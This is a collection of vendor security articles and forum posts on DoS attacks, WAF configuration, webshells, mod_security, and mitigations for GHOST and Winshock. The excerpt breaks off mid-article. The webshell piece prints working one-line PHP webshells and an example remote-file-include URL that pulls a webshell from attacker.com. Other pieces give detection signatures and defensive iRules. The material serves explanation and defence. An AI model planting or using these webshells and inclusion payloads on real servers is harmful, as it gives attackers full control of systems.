application security
95 TopicsLayer 4 vs Layer 7 DoS Attack
Not all DoS (Denial of Service) attacks are the same. While the end result is to consume as much - hopefully all - of a server or site's resources such that legitimate users are denied service (hence the name) there is a subtle difference in how these attacks are perpetrated that makes one easier to stop than the other. SYN Flood A Layer 4 DoS attack is often referred to as a SYN flood. It works at the transport protocol (TCP) layer. A TCP connection is established in what is known as a 3-way handshake. The client sends a SYN packet, the server responds with a SYN ACK, and the client responds to that with an ACK. After the "three-way handshake" is complete, the TCP connection is considered established. It is as this point that applications begin sending data using a Layer 7 or application layer protocol, such as HTTP. A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK that should come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server. SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the "endpoint" of the connection) it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity. The attackers are generally stopped from flooding the network through the use of SYN cookies. SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to allow a proxy/delivery solution with hardware accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server alleviates much of the gains achieved by preventing SYN floods and often results in available, but unacceptably slow performing servers and sites. HTTP GET DoS A Layer 7 DoS attack is a different beast and it's more difficult to detect. A Layer 7 DoS attack is often perpetrated through the use of HTTP GET. This means that the 3-way TCP handshake has been completed, thus fooling devices and solutions which are only examining layer 4 and TCP communications. The attacker looks like a legitimate connection, and is therefore passed on to the web or application server. At that point the attacker begins requesting large numbers of files/objects using HTTP GET. They are generally legitimate requests, there are just a lot of them. So many, in fact, that the server quickly becomes focused on responding to those requests and has a hard time responding to new, legitimate requests. When rate-limiting was used to stop this type of attack, the bad guys moved to using a distributed system of bots (zombies) to ensure that the requests (attack) was coming from myriad IP addresses and was therefore not only more difficult to detect, but more difficult to stop. The attacker uses malware and trojans to deposit a bot on servers and clients, and then remotely includes them in his attack by instructing the bots to request a list of objects from a specific site or server. The attacker might not use bots, but instead might gather enough evil friends to launch an attack against a site that has annoyed them for some reason. Layer 7 DoS attacks are more difficult to detect because the TCP connection is valid and so are the requests. The trick is to realize when there are multiple clients requesting large numbers of objects at the same time and to recognize that it is, in fact, an attack. This is tricky because there may very well be legitimate requests mixed in with the attack, which means a "deny all" philosophy will result in the very situation the attackers are trying to force: a denial of service. Defending against Layer 7 DoS attacks usually involves some sort of rate-shaping algorithm that watches clients and ensures that they request no more than a configurable number of objects per time period, usually measured in seconds or minutes. If the client requests more than the configurable number, the client's IP address is blacklisted for a specified time period and subsequent requests are denied until the address has been freed from the blacklist. Because this can still affect legitimate users, layer 7 firewall (application firewall) vendors are working on ways to get smarter about stopping layer 7 DoS attacks without affecting legitimate clients. It is a subtle dance and requires a bit more understanding of the application and its flow, but if implemented correctly it can improve the ability of such devices to detect and prevent layer 7 DoS attacks from reaching web and application servers and taking a site down. The goal of deploying an application firewall or proxy-based application delivery solution is to ensure the fast and secure delivery of an application. By preventing both layer 4 and layer 7 DoS attacks, such solutions allow servers to continue serving up applications without a degradation in performance caused by dealing with layer 4 or layer 7 attacks.20KViews0likes3CommentsMaking WAF Simple: Introducing the OWASP Compliance Dashboard
Whether you are a beginner or an expert, there is a truth that I want to let you in on; building and maintaining Web Application Firewall (WAF) security policies can be challenging. How much security do you really need? Is your configuration too much or too little? Have you created an operational nightmare? Many well-intentioned administrators will initially enable every available feature, thinking that it is providing additional security to the application, when in truth, it is hindering it. How, you may ask? False positives and noise. The more noise and false positives, the harder it becomes to find the real attacks and the increased likelihood that you begin disabling features that ARE providing essential security for your applications. So… less is better then? That isn't the answer either, what good are our security solutions if they aren't protecting against anything? The key to success and what we will look at further in this article, is implementing best practice controls that are both measurable and manageable for your organization. The OWASP Application Security Top 10 is a well-respected list of the ten most prevalent and dangerous application layer attacks that you almost certainly should protect your applications from. By first focusing your security controls on the items in the OWASP Top 10, you are improving the manageability of your security solution and getting the most "bang for your buck". Now, the challenge is, how do you take such a list and build real security protections for your applications? Introducing the OWASP Compliance Dashboard Protecting your applications against the OWASP Top 10 is not a new thing, in fact, many organizations have been taking this approach for quite some time. The challenge is that most implementations that claim to "protect" against the OWASP Top 10 rely solely on signature-based protections for only a small subset of the list and provide zero insight into your compliance status. The OWASP Compliance Dashboard introduced in version 15.0 on BIG-IP Advanced WAF reinvents this idea by providing a holistic and interactive dashboard that clearly measures your compliancy against the OWASP Application Security Top 10. The Top 10 is then broken down into specific security protections including both positive and negative security controls that can be enabled, disabled, or ignored directly on the dashboard. We realize that a WAF policy alone may not provide complete protection across the OWASP Top 10, this is why the dashboard also includes the ability to review and track the compliancy of best practices outside the scope of a WAF alone, such as whether the application is subject to routine patching or vulnerability scanning. To illustrate this, let’s assume I have created a brand new WAF policy using the Rapid Deployment policy template and accepted all default settings, what compliance score do you think this policy might have? Let's take a look. Interesting. The policy is 0/10 compliant and only A2 Broken Authentication and A3 Sensitive Data Exposure have partial compliance. Why is that? The Rapid Deployment template should include some protections by default, shouldn't it? Expanding A1 Injection, we see a list of protections required in order to be marked as compliant. Hovering over the list of attack signatures, we see that each category of signature is in 'Staging' mode, aha! Signatures in staging mode are not enforced and therefore cannot block traffic. Until the signature set is in enforced, we do not mark that protection as compliant. For those of you who have mistakenly left entities such as Signatures in staging for longer than desired, this is also a GREAT way to quickly find them. I also told you we could also interact with the dashboard to influence the compliancy score, lets demonstrate that. Each item can be enforced DIRECTLY on the dashboard by selecting the "Enforce" checkmark on the right. No need to go into multiple menus, you can enforce all these security settings on a single page and preview the compliance status immediately. If you are happy with your selection, click on "Review & Update" to perform a final review of what the dashboard will be configuring on your behalf before you can click on "Save & Apply Policy". Note: Enforcing signatures before a period of staging may not be a good idea depending on your environment. Staging provides a period to assess signature matches in order to eliminate false positives. Enforcing these signatures too quickly could result in the denying of legitimate traffic. Let's review the compliancy of our policy now with these changes applied. As you can see, A1 Injection is now 100% compliant and other categories have also had their score updated as a result of enforcing these signatures. The reason for this is because there is overlap in the security controls applied acrossthese other categories. Not all security controls can be fully implemented directly via the dashboard, and as mentioned previously, not all security controls are signature-based. A6 Cross-Site Scripting was recalculated as 50% complaint with the signatures we enforced previously so let's take a look at what else it required for full compliancy. The options available to us are to IGNORE the requirement, meaning we will be granted full compliancy for that item without implementing any protection, or we can manually configure the protection referenced. We may want to ignore a protection if it is not applicable to the application or if it is not in scope for your deployment. Be mindful that ignoring an item means you are potentially misrepresenting the score of your policy, be very certain that the protection you are ignoring is in fact not applicable before doing so. I've selected to ignore the requirement for "Disallowed Meta Characters in Parameters" and my policy is now 100% compliance for A7 Cross-Site Scripting (XSS). Lastly, we will look at items within the dashboard that fall outside the scope of WAF protections. Under A9 Using Components with Known Vulnerabilities, we are presented with a series of best practices such as “Application and system hardening”, “Application and system patching” and “Vulnerability scanner integration”. Using the dashboard, you can click on the checkmark to the right for "Requirement fulfilled" to indicate that your organization implements these best practices. By doing so, the OWASP Compliance score updates, providing you with real-time visibility into the compliancy for your application. Conclusion The OWASP Compliance Dashboard on BIG-IP Advanced WAF is a perfect fit for the security administrator looking to fine-tune and measure either existing or new WAF policies against the OWASP App Security Top 10. The OWASP Compliance Dashboard not only tracks WAF-specific security protections but also includes general best practices, allowing you to use the dashboard as your one-stop-shop to measure the compliancy for ALL your applications. For many applications, protection against the OWASP Top 10 may be enough, as it provides you with best practices to follow without having to worry about which features to implement and where. Note: Keep in mind that some applications may require additional controls beyond the protections included in the OWASP Top 10 list. For teams heavily embracing automation and CI/CD pipelines, logging into a GUI to perform changes likely does not sound appealing. In that case, I suggest reading more about our Declarative Advanced WAF policy framework which can be used to represent the WAF policies in any CI/CD pipeline. Combine this with the OWASP Compliance Dashboard for an at-a-glance assessment of your policy and you have the best of both worlds. If you're not already using the OWASP Compliance Dashboard, what are you waiting for? Look out for Bill Brazill, Victor Granic and myself (Kyle McKay) on June 10th at F5 Agility 2020 where we will be presenting and facilitating a class called "Protecting against the OWASP Top 10". In this class, we will be showcasing the OWASP Compliance Dashboard on BIG-IP Advanced WAF further and providing ample hands-on time fine-tuning and measuring WAF policies for OWASP Compliance. Hope to see you there! To learn more, visit the links below. Links OWASP Compliance Dashboard: https://support.f5.com/csp/article/K52596282 OWASP Application Security Top 10: https://owasp.org/www-project-top-ten/ Agility 2020: https://www.f5.com/agility/attend7.5KViews8likes0CommentsWebshells
Webshells are web scripts (PHP/ASPX/etc.) that act as a control panel for the server running them. A webshell may be legitimately used by the administrator to perform actions on the server, such as: Create a user Restart a service Clean up disk space Read logs More… Therefore, a webshell simplifies server management for administrators that are not familiar with (or are less comfortable with) internal system commands using the console. However, webshells have bad connotations as well – they are a very popular post-exploitation tool that allow an attacker to gain full system control. Webshell Examples An example of a webshell may be as simple as the following script: <?php echo(system($_GET["q"])); ?> This script will read a user-provided value and pass it on to the underlying operating system as a shell command. For instance, issuing the following request will invoke the ‘ls’ command and print the result to the screen: http://example.com/webshell.php?q=ls An even simpler example for a webshell may be this: <?php eval($_GET["q"]); ?> This script will simply use the contents of the parameter “q” and evaluate it as pure PHP code. Example: http://example.com/webshell.php?q=echo%20("hello%20world")%3B From this point, the options are limitless. An attacker that uses a webshell on a compromised server effectively has full control over the application. If the web application is running under root – the attacker has full control over the entire web server as well. In many cases, the neighboring servers on the local network are at risk as well. How does a webshell attack work? We’ve now seen that a webshell script is a very powerful tool. However, a webshell is a “post-exploitation” tool – meaning an attacker first has to find a vulnerability in the web application, exploit it, and upload their webshell onto the server. One way to achieve this is by first uploading the webshell through a legitimate file upload page (for instance, a CV submission form on a company website) and then using an LFI (Local File Include) weakness in the application to include the webshell in one of the pages. A different approach may be an application vulnerable to arbitrary file write. An attacker may simply write the code to a new file on the server. Another example may be an RFI (Remote File Include) weakness in the application that effectively eliminates the need to upload the webshell on to the server. An attacker may host the webshell on a completely different server, and force the application to include it, like this: http://vulnerable.com/rfi.php?include=http://attacker.com/webshell.php The b374k webshell There are many and various implementations of webshells. As mentioned, those are not always meant to be used by attackers, but also by system administrators. Some of the “suspicious” webshells that are more popular with attackers are the following: c99 r57 c100 PHPjackal Locus In this article we will explore an open source webshell called b374k (https://github.com/b374k/b374k). From the readme: This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser Features: File manager (view, edit, rename, delete, upload, download, archiver, etc) Search file, file content, folder (also using regex) Command execution More… Once we get the webshell up and running, we can view information and perform actions on the server. Listed below are a few use cases for this webshell that will demonstrate the power of webshells and how attackers can benefit from running them on a compromised web server: View process information and varied system information. Open a terminal and execute various commands, or open a code evaluator to run arbitrary code. Open a reverse shell on the server, to make sure access to the server is preserved. Issue outgoing HTTP requests from the server. Perform social engineering activities to broaden the scope of the attack. Mitigation using F5 ASM The F5 ASM module uses detection and prevention methods for each variation of this attack. For RFI (Remote File Include): ASM will detect any request that attempts to include an external URL, and prevent access. For Unrestricted File Upload + LFI (Local File Include): During upload or creation attempt of the webshell, ASM will detect the active code and prevent it from reaching the server. If the webshell is already on the server, ASM will detect when the application tries to reach the file using LFI and prevent access. If the webshell is already on the server and part of the application, ASM will detect when a suspicious page is requested, and prevent that page from being displayed.2.9KViews0likes4Comments4 reasons not to use mod-security
Apache is a great web server if for no other reason than it offers more flexibility through modules than just about any other web server. You can plug-in all sorts of modules to enhance the functionality of Apache. But as I often say, just because you can doesn't mean you should. One of the modules you can install is mod_security. If you aren't familiar with mod_security, essentially it's a "roll your own" web application firewall plug-in for the Apache web server. Some of the security functions you can implement via mod_security are: Simple filtering Regular Expression based filtering URL Encoding Validation Unicode Encoding Validation Auditing Null byte attack prevention Upload memory limits Server identity masking Built in Chroot support Using mod_security you can also implement protocol security, which is an excellent idea for ensuring that holes in protocols aren't exploited. If you aren't sold on protocol security you should read up on the recent DNS vulnerability discovered by Dan Kaminsky - it's all about the protocol and has nothing to do with vulnerabilities introduced by implementation. mod_security provides many options for validating URLs, URIs, and application data. You are, essentially, implementing a custom web application firewall using configuration directives. If you're on this path then you probably agree that a web application firewall is a good thing, so why would I caution against using mod_security? Well, there's four reasons, actually. It runs on every web server. This is an additional load on the servers that can be easily offloaded for a more efficient architecture. The need for partial duplication of configuration files across multiple machines can also result in the introduction of errors or extraneous configuration that is unnecessary. Running mod_security on every web server decreases capacity to serve users and applications accordingly, which may require additional servers to scale to meet demand. You have to become a security expert. You have to understand the attacks you are trying to stop in order to write a rule to prevent them. So either you become an expert or you trust a third-party to be the expert. The former takes time and that latter takes guts, as you're introducing unnecessary risk by trusting a third-party. You have to become a protocol expert. In addition to understanding all the attacks you're trying to prevent, you must become an expert in the HTTP protocol. Part of providing web application security is to sanitize and enforce the HTTP protocol to ensure it isn't abused to create a hole where none previously appeared. You also have to become an expert in Apache configuration directives, and the specific directives used to configure mod_security. The configuration must be done manually. Unless you're going to purchase a commercially supported version of mod_security, you're writing complex rules manually. You'll need to brush up on your regular expression skills if you're going to attempt this. Maintaining those rules is just as painful, as any update necessarily requires manual intervention. Of course you could introduce an additional instance of Apache with mod_security installed that essentially proxies all requests through mod_security, thus providing a centralized security architecture, but at that point you've just introduced a huge bottleneck into your infrastructure. If you're already load-balancing multiple instances of a web site or application, then it's not likely that a single instance of Apache with mod_security is going to be able to handle the volume of requests without increasing downtime or degrading performance such that applications might as well be down because they're too painful to use. Centralizing security can improve performance, reduce the potential avenues of risk through configuration error, and keeps your security up-to-date by providing easy access to updated signatures, patterns, and defenses against existing and emerging web application attacks. Some web application firewalls offer pre-configured templates for specific applications like Microsoft OWA, providing a simple configuration experience that belies the depth of security knowledge applied to protected the application. Web application firewalls can enable compliance with requirement 6.6 of PCI DSS. And they're built to scale, which means the scenario in which mod_security is used as a reverse proxy to protect all web servers from harm but quickly becomes a bottleneck and impediment to performance doesn't happen with purpose-built web application firewalls. If you're considering using mod_security then you already recognize the value of and need for a web application firewall. That's great. But consider carefully where you will deploy that web application firewall, because the decision will have an impact on the performance and availability of your site and applications.1.5KViews0likes7CommentsGHOST Vulnerability (CVE-2015-0235)
On 27 of January Qualys publisheda critical vulnerability dubbed “GHOST” as it can be triggered by the GetHOST functions ( gethostbyname*() ) of the glibc library shipping with the Linux kernel. Glibc is the main library of C language functionality and is present on most linux distributions. Those functions are used to get a corresponding structure out of a supplied hostname, while it also performs a DNS lookup if the hostname is a domain name and not an IP address. The vulnerable functions are obsolete however are still in use by many popular applications such as Apache, MySQL, Nginx and Node.js. Presently this vulnerability was proven to be remotely exploited for the Exim mail service only, while arbitrary code execution on any other system using those vulnerable functions is very context-dependent. Qualys mentioned through a security email list, the applications that were investigated but found to not contain the buffer overflow. Read more on the email list archive link below: http://seclists.org/oss-sec/2015/q1/283 Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to its “gethostbyname()” equivalent. UPDATE: WordPress content management system using xml-rpc ping back functionality was found to be vulnerable to the GHOST vulnerability. WordPress automatically notifies popular Update Services that you've updated your blog by sending aXML-RPCpingeach time you create or update a post. By sending a specially crafted hostname as paramter of xml-rpc ping back method the vulnerable Wordpress will return "500" HTTP response or no response at all after resulting in memory corruption. However, no exploitability was proven yet. Using ASM to Mitigate WordPress GHOST exploit As the crafted hostname should be around 1000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user defined attack signature to detect and prevent potential exploitation of this specific vulnerability for WordPress systems. For version greater than 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i"; For versions below 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i"; This signature will catch any request to the "xmlrpc.php" URL which contains IPv4 format hostname greater than 500 characters. iRule Mitigation for Exim GHOST exploit At this time, only Exim mail servers are known to be exploitable remotely if configured to verify hosts after EHLO/HELO command in an SMTP session. If you run the Exim mail server behind a BigIP, the following iRule will detect and mitigate exploitation attempts: when CLIENT_ACCEPTED { TCP::collect } when CLIENT_DATA { if { ( [string toupper [TCP::payload]] starts_with "HELO " or [string toupper [TCP::payload]] starts_with "EHLO " ) and ( [TCP::payload length] > 1000 ) } { log local0. "Detected GHOST exploitation attempt" TCP::close } TCP::release TCP::collect } This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.1.4KViews0likes7CommentsMitigating Winshock (CVE-2014-6321) Vulnerabilities Using BIG-IP iRules
Recently we’ve witnessed yet another earth shattering vulnerability in a popular and very fundamental service. Dubbed Winshock, it follows and joins the Heartbleed, Shellshock and Poodle in the pantheon of critical vulnerabilities discovered in 2014. Winshock (CVE-2014-6321) earns a 10.0 CVSS score due to being related to a common service such as TLS, and potentially allowing remote arbitrary code execution. SChannel From MSDN: Secure Channel, also known as Schannel, is a security support provider (SSP) that contains a set of security protocols that provide identity authentication and secure, private communication through encryption. Basically, SChannel is Microsoft’s implementation of TLS, and it is used in various MS-related services that support encryption and authentication – such as: Internet Information Services (IIS), Remote Desktop Protocol, Exchange and Outlook Web Access, SharePoint, Active Directory and more. Naturally, SChannel also contains implementation for the TLS handshake protocol, which is performed before every secure session is established between the client and the server. The TLS Handshake The following image demonstrates how a typical TLS handshake looks like: Image source: http://www-01.ibm.com/support/knowledgecenter/SSFKSJ_7.1.0/com.ibm.mq.doc/sy10660_.htm?lang=en The handshake is used for the client and the server to agree on the terms of the connection. The handshake is conducted using messages, for the purpose of authenticating between the server and the client, agreeing on cipher suites, and exchanging public keys using certificates. Each type of message is passed on the wire as a unique “TLS Record”. Several messages (TLS records) may be sent over one packet. Some of the known TLS records are the following: Client Hello – The client announces it would like to initiate a connection with the server. It also presents all the various cipher suites it can support. This record may also have numerous extensions used to provide even more data. Server Hello – The server acknowledges the Client Hello and presents its own information. Certificate Request – In some scenarios, the client is required to present its certificate in order to authenticate itself. This is known as two-way authentication (or a mutual authentication). The Certificate Request message is sent by the server and forces the client to present a valid certificate before the handshake is successful. Certificate – A message used to transfer the contents of a certificate, including subject name, issuer, public key and more. Certificate Verify – Contains signed value using the client’s private key. It is presented by the client along with their certificate during a 2-way handshake, and serves as a proof of the client actually holding the certificate they claim to. SChannel Vulnerabilities Two vulnerabilities were found in the way SChannel handles those TLS records. One vulnerability occurs when parsing the “server_name” extension of the Client Hello message. This extension is typically used to specify the host name which the client is trying to connect to on the target server. In some way this is similar to the HTTP “Host” header. It was found that SChannel will not properly manage memory allocation when this record contains more than one server name. This vulnerability leads to denial of service by memory exhaustion. The other vulnerability occurs when an invalid signed value is presented inside a Certificate Verify message. It was found that values larger than what the server expects will be written to the memory beyond the allocated buffer scope. This behavior may result in a potential remote code execution. Mitigationwith BIG-IP iRules SSL offloading using BIG-IP is inherently not vulnerable as it does not relay vulnerable messages to the backend server. However, in a “pass-through” scenario, where all the TLS handshake messages are being forwarded without inspection, backend servers may be vulnerable to these attacks. The following iRule will detect and mitigate attempts to exploit above SChannel vulnerabilities: when CLIENT_ACCEPTED { TCP::collect set MAX_TLS_RECORDS 16 set iPacketCounter 0 set iRecordPointer 0 set sPrimeCurve "" set iMessageLength 0 } when CLIENT_DATA { #log local0. "New TCP packet. Length [TCP::payload length]. Packet Counter $iPacketCounter" set bScanTLSRecords 0 if { $iPacketCounter == 0 } { binary scan [TCP::payload] cSS tls_xacttype tls_version tls_recordlen if { [info exists tls_xacttype] && [info exists tls_version] && [info exists tls_recordlen] } { if { ($tls_version == "769" || $tls_version == "770" || $tls_version == "771") && $tls_xacttype == 22 } { set bScanTLSRecords 1 } } } if { $iPacketCounter > 0 } { # Got here mid record, collect more fragments #log local0. "Gather. tls rec $tls_recordlen, ptr $iRecordPointer" if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } { #log local0. "Full record received" set bScanTLSRecords 1 } else { #log local0. "Record STILL fragmented" set iPacketCounter [expr {$iPacketCounter + 1}] TCP::collect } } if { $bScanTLSRecords } { # Start scanning records set bNextRecord 1 set bKill 0 while { $bNextRecord >= 1 } { #log local0. "Reading next record. ptr $iRecordPointer" binary scan [TCP::payload] @${iRecordPointer}cSS tls_xacttype tls_version tls_recordlen #log local0. "SSL Record Type $tls_xacttype , Version: $tls_version , Record Length: $tls_recordlen" if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } { binary scan [TCP::payload] @[expr {$iRecordPointer + 5}]c tls_action if { $tls_xacttype == 22 && $tls_action == 1 } { #log local0. "Client Hello" set iRecordOffset [expr {$iRecordPointer + 43}] binary scan [TCP::payload] @${iRecordOffset}c tls_sessidlen set iRecordOffset [expr {$iRecordOffset + 1 + $tls_sessidlen}] binary scan [TCP::payload] @${iRecordOffset}S tls_ciphlen set iRecordOffset [expr {$iRecordOffset + 2 + $tls_ciphlen}] binary scan [TCP::payload] @${iRecordOffset}c tls_complen set iRecordOffset [expr {$iRecordOffset + 1 + $tls_complen}] binary scan [TCP::payload] @${iRecordOffset}S tls_extenlen set iRecordOffset [expr {$iRecordOffset + 2}] binary scan [TCP::payload] @${iRecordOffset}a* tls_extensions for { set i 0 } { $i < $tls_extenlen } { incr i 4 } { set iExtensionOffset [expr {$i}] binary scan $tls_extensions @${iExtensionOffset}SS etype elen if { ($etype == "00") } { set iScanStart [expr {$iExtensionOffset + 9}] set iScanLength [expr {$elen - 5}] binary scan $tls_extensions @${iScanStart}A${iScanLength} tls_servername if { [regexp \x00 $tls_servername] } { log local0. "Winshock detected - NULL character in host name. Server Name: $tls_servername" set bKill 1 } else { #log local0. "Server Name found valid: $tls_servername" } set iExtensionOffset [expr {$iExtensionOffset + $elen}] } else { #log local0. "Uninteresting extension $etype" set iExtensionOffset [expr {$iExtensionOffset + $elen}] } set i $iExtensionOffset } } elseif { $tls_xacttype == 22 && $tls_action == 11 } { #log local0. "Certificate" set iScanStart [expr {$iRecordPointer + 17}] set iScanLength [expr {$tls_recordlen - 12}] binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_certificate if { [regexp {\x30\x59\x30\x13\x06\x07\x2a\x86\x48\xce\x3d\x02\x01(\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07|\x06\x05\x2b\x81\x04\x00(?:\x22|\x23))} $client_certificate reMatchAll reMatch01] } { #log local0. $match01 switch $reMatch01 { "\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07" { set sPrimeCurve "P-256" } "\x06\x05\x2b\x81\x04\x00\x22" { set sPrimeCurve "P-384" } "\x06\x05\x2b\x81\x04\x00\x23" { set sPrimeCurve "P-521" } default { #log local0. "Invalid curve" } } } } elseif { $tls_xacttype == 22 && $tls_action == 15 } { #log local0. "Certificate Verify" set iScanStart [expr {$iRecordPointer + 11}] set iScanLength [expr {$tls_recordlen - 6}] binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_signature binary scan $client_signature c cSignatureHeader if { $cSignatureHeader == 48 } { binary scan $client_signature @3c r_len set s_len_offset [expr {$r_len + 5}] binary scan $client_signature @${s_len_offset}c s_len set iMessageLength $r_len if { $iMessageLength < $s_len } { set iMessageLength $s_len } } else { #log local0. "Sig header invalid" } } else { #log local0. "Uninteresting TLS action" } # Curve and length found - check Winshock if { $sPrimeCurve ne "" && $iMessageLength > 0 } { set iMaxLength 0 switch $sPrimeCurve { "P-256" { set $iMaxLength 33 } "P-384" { set $iMaxLength 49 } "P-521" { set $iMaxLength 66 } } if { $iMessageLength > $iMaxLength } { log local0. "Winshock detected - Invalid message length (found: $iMessageLength, max:$iMaxLength)" set bKill 1 } } # Exploit found, close connection if { $bKill } { TCP::close set bNextRecord 0 } else { # Next record set iRecordPointer [expr {$iRecordPointer + $tls_recordlen + 5}] if { $iRecordPointer == [TCP::payload length]} { # End of records => Assume it is the end of the packet. #log local0. "End of records" set bNextRecord 0 set iPacketCounter 0 set iRecordPointer 0 set sPrimeCurve "" set iMessageLength 0 TCP::release TCP::collect } else { if { $bNextRecord < $MAX_TLS_RECORDS } { set bNextRecord [expr {$bNextRecord + 1}] } else { set bNextRecord 0 #log local0. "Too many loops over TLS records, exit now" TCP::release TCP::collect } } } } else { #log local0. "Record fragmented" set bNextRecord 0 set iPacketCounter [expr {$iPacketCounter + 1}] TCP::collect } } } else { # Exit here if packet is not TLS handshake if { $iPacketCounter == 0 } { TCP::release TCP::collect } } } Create a new iRule and attach it to your virtual server.1.2KViews0likes13CommentsPreventing DDoS attacks on SMS URL
Dear Community, I am facing DDoS attacks on one of our application. The attacker is sending hundred of requests to a URL, which is consuming all of our SMS quota. The attack is originating from multiple IPs. Please inform how I can protect this application API from this kind of DDoS attack from appliation code level. I need help from application security experts and web developers. https://abc.comis frontend & xyz.com is backend api Sample of DDoS reqeust: POST /asdf/service/sendmobilecode HTTP/1.1 Host:xyz.com Authorization: *********** User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/json Origin:https://abc.com Referer:https://abc.com/ {"number":"91234567890"} Kind Regards1.1KViews0likes3CommentsProtecting against DDoS attack
Dear Community, I need help from application security experts and seasoned web developers. We are getting DDoS attacks on the following requests. This attack is targetting our SMS gateway; resulting in triggerig thousands of SMSs. Please inform which kind of protections we can introduce in application level / application code level to protect against this DDoS attack. DDoS Request Sample: POST xyz.com/api/otp/asdf HTTP/1.1 Host: xyz.com Content-Length: 32 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90" Accept: application/json, text/plain, */* Authorization: *********** Accept-Language: ar Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/json Origin: http://abc.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer:http://abc.com Accept-Encoding: gzip, deflate Connection: close {"mobileNumber":"123456789"} Warm Regards946Views0likes1CommentBeware Using Internal Encryption as an IT Security Blanket
It certainly sounds reasonable: networks are moving toward a perimeter-less model so the line between internal and external network is blurring. The introduction of cloud computing as overdraft protection (cloud-bursting) further blurs that perimeter such that it’s more a suggestion than a rule. That makes the idea of encrypting everything whether it’s on the internal or external network seem to be a reasonable one. Or does it? THE IMPACT ON OPERATIONS A recent post posits that PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing. The arguments are valid, but there is a catch (there’s always a catch). Consider this nugget from the article: Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data. In addition, layer 2 security features should be enabled on the access switches carrying said data. Be sure to unencrypt your data streams before sending them to IPS, DLP, and other deep packet inspection devices. This is easy to say but in many cases harder to implement in practice. If you run into any issues feel free to post them here. I realize this is a controversial topic for security geeks (like myself) but given recent PCI breaches that took advantage of the above weaknesses, I have to error on the side of security. Sure more security doesn’t always mean better security, but smarter security always equals better security, which I believe is the case here. [emphasis added] It is the reminder to decrypt data streams before sending them to IPS, DLP, and other “deep packet inspection devices” that brings to light one of the issues with such a decision: complexity of operations and management. It isn’t just the additional latency inherent in the decryption of secured data streams required for a large number of the devices in an architecture to perform their tasks that’s the problem, though that is certainly a concern. The larger problem is the operational inefficiency that comes from the decryption of secured data at multiple points in the architecture. See there’s this little thing called “keys” that have to be shared with every device in the data center that will decrypt data, and that means managing each of those key stores in their own right. Keys are the, well, key to the kingdom of data encryption and if they are lost or stolen it can be disastrous to the security of all affected systems and applications. By better securing data in flight through encryption of all data on the internal network an additional layer of insecurity is introduced that must be managed. But let’s pretend this additional security issue doesn’t exist, that all systems on which these keys are stored are secure (ha!). Operations must still (a) configure every inline device to decrypt and re-encrypt the data stream and (b) manage the keys/certificates on every inline device. That’s in addition to managing the keys/certificates on every endpoint for which data is destined. There’s also the possibility that intermediate devices for which data will be decrypted before receiving – often implemented using spanned/mirrored ports on a switch/router – will require a re-architecting of the network in order to implement such an architecture. Not only must each device be configured to decrypt and re-encrypt data streams, it must be configured to do so for every application that utilizes encryption on the internal network. For an organization with only one or two applications this might not be so onerous a task, but for organizations that may be using multiple applications, domains, and thus keys/certificates, the task of deploying all those keys/certificates and configuring each device and then managing them through the application lifecycle can certainly be a time-consuming process. This isn’t a linear mathematics problem, it’s exponential. For every key or certificate added the cost of managing that information increases by the number of devices that must be in possession of that key/certificate. INTERNAL ENCRYPTION CAN HIDE REAL SECURITY ISSUES The real problem, as evinced by recent breaches of payment card processing vendors like Heartland Systems is not that data was or was not encrypted on the internal network, but that the systems through which that data was flowing were not secured. Attackers gained access through the systems, the ones we are pretending are secure for the sake of argument. Obviously, pretending they are secure is not a wise course of action. One cannot capture and sniff out unsecured data on an internal network without first being on the internal network. This is a very important point so let me say it again: One cannot capture and sniff out unsecured data on an internal network without first being on the internal network. It would seem, then, that the larger issue here is the security of the systems and devices through which sensitive data must travel and that encryption is really just a means of last resort for data traversing the internal network. Internal encryption is often a band-aid which often merely covers up the real problem of insecure systems and poorly implemented security policies. Granted, in many industries internal encryption is a requirement and must be utilized, but those industries also accept and grant IT the understanding that costs will be higher in order to implement such an architecture. The additional costs are built into the business model already. That’s not necessarily true for most organizations where operational efficiency is now just as high a priority as any other IT initiative. The implementation of encryption on internal networks can also lead to a false sense of security. It is important to remember that encrypted tainted data is still tainted data; it is merely hidden from security systems which are passive in nature unless the network is architected (or re-architected) such that the data 